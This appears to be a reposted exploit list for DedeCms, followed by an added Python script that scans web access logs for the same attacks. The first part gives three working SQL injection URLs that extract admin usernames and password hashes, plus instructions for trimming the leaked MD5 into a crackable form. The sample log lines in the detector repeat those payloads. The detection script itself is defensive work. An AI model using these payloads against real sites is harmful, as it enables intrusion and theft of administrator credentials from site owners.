DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 characters and the last 7 characters removed, which gives a 20-character MD5 password. To get the 16-character MD5, remove 3 characters from the front and 1 from the end.

Dedecms (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCms (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
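
A defender-side check for the three request shapes listed above, as an added example that is not part of the original post: it scans web access-log lines for requests to these DedeCms endpoints whose named parameter carries SQL. The combined log format, the function and variable names, and the sample lines (constructed, with the page's requests percent-encoded where needed) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint suffix -> query parameter that carries SQL in the requests listed above.
WATCHED = {
    "/plus/advancedsearch.php": "sql",
    "/plus/feedback_js.php": "arcurl",
    "/plus/infosearch.php": "q",
}
# SQL markers present in those requests: statement keywords and the admin table names.
SQL_MARKER = re.compile(r"union\s+select|select\s.+\sfrom\s|dede_admin|#@__admin", re.I | re.S)
# Request line of a combined-format access log entry (the log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /plus/infosearch.php?action=search&q=%cf\'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /plus/infosearch.php?action=search&q=holiday%20photos HTTP/1.1" 200 2210',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /dedecms51/plus/feedback_js.php?arcurl=%27%20union%20select%20%22%27%20and%201=2%20union%20select%201,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1%20from%20dede_admin%20where%201=1%20union%20select%20*%20from%20dede_feedback%20where%201=2%20and%20%27%27=%27%22%20from%20dede_admin%20where%20%27%27=%27 HTTP/1.1" 200 90',
]


def suspicious_requests(log_lines):
    """Return (line_number, endpoint, parameter) for each request that matches."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        try:
            target = urlsplit(match.group(1))
        except ValueError:  # malformed request target
            continue
        path = target.path.lower()
        for endpoint, param in WATCHED.items():
            # Suffix match, because the CMS may be installed under a subdirectory.
            if not path.endswith(endpoint):
                continue
            # parse_qs percent-decodes once, so %20union%20select becomes "union select".
            values = parse_qs(target.query, keep_blank_values=True).get(param, [])
            if any(SQL_MARKER.search(value) for value in values):
                hits.append((number, endpoint, param))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected and it is decoded once, so POST bodies and double-encoded values need a separate pass.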